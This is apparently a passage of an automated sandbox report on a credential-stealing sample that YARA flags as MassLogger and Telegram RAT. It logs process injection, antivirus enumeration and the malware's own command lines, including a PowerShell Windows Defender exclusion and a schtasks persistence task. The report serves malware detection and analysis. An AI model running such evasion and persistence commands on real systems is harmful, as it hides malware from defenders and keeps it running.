                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 598938Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 598813Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 598703Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 598583Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 598453Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 598344Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 598234Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 598125Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 598016Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 597904Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 597797Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 597687Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 597578Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 597468Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 597359Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 597250Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 597138Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 597031Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 596922Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 596813Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 596688Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 596563Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 596438Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 596313Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 596203Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 596094Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 595969Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 595860Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 595735Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 595610Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 595485Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 595360Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 595235Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 595110Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 594985Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 594860Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 594735Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 594610Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 594485Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 594360Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeThread delayed: delay time: 594235Jump to behavior
                  Source: gJdonuKfIrqN.exe, 0000000C.00000002.3766137317.0000000000FF6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: UOEAjWmusE.exe, 00000007.00000002.3765628401.0000000000D65000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllon.H
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeCode function: 7_2_0116C168 LdrInitializeThunk,LdrInitializeThunk,7_2_0116C168
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  .NET source code references suspicious native API functions
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, UltraSpeed.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                  Source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe"
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe"Jump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeMemory written: C:\Users\user\Desktop\UOEAjWmusE.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeMemory written: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmpF362.tmp"Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess created: C:\Users\user\Desktop\UOEAjWmusE.exe "C:\Users\user\Desktop\UOEAjWmusE.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeProcess created: C:\Users\user\Desktop\UOEAjWmusE.exe "C:\Users\user\Desktop\UOEAjWmusE.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\gJdonuKfIrqN" /XML "C:\Users\user\AppData\Local\Temp\tmp43A.tmp"Jump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeProcess created: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe "C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeQueries volume information: C:\Users\user\Desktop\UOEAjWmusE.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.3031.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeQueries volume information: C:\Users\user\Desktop\UOEAjWmusE.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeQueries volume information: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeQueries volume information: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Roaming\gJdonuKfIrqN.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Users\user\Desktop\UOEAjWmusE.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct
                  Source: C:\Program Files\Windows Defender\MpCmdRun.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\SecurityCenter2 : AntiVirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Yara detected MSIL Logger
                  Source: Yara matchFile source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: UOEAjWmusE.exe PID: 6704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: UOEAjWmusE.exe PID: 2992, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gJdonuKfIrqN.exe PID: 3552, type: MEMORYSTR
                  Yara detected MassLogger RAT
                  Source: Yara matchFile source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1332453458.0000000004663000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: UOEAjWmusE.exe PID: 6704, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: UOEAjWmusE.exe PID: 2992, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gJdonuKfIrqN.exe PID: 3552, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: gJdonuKfIrqN.exe PID: 1616, type: MEMORYSTR
                  Yara detected Telegram RAT
                  Source: Yara matchFile source: 7.2.UOEAjWmusE.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e24210.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e3b030.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3cb08b8.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e24210.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.3e3b030.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.47e14e0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.UOEAjWmusE.exe.483c900.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 9.2.gJdonuKfIrqN.exe.3c99a98.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000007.00000002.3765410007.0000000000403000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.1332453458.0000000003DF9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.1376866366.0000000003C99000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000007.00000002.3767694744.0000000002E16000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.3768174332.0000000002EA7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
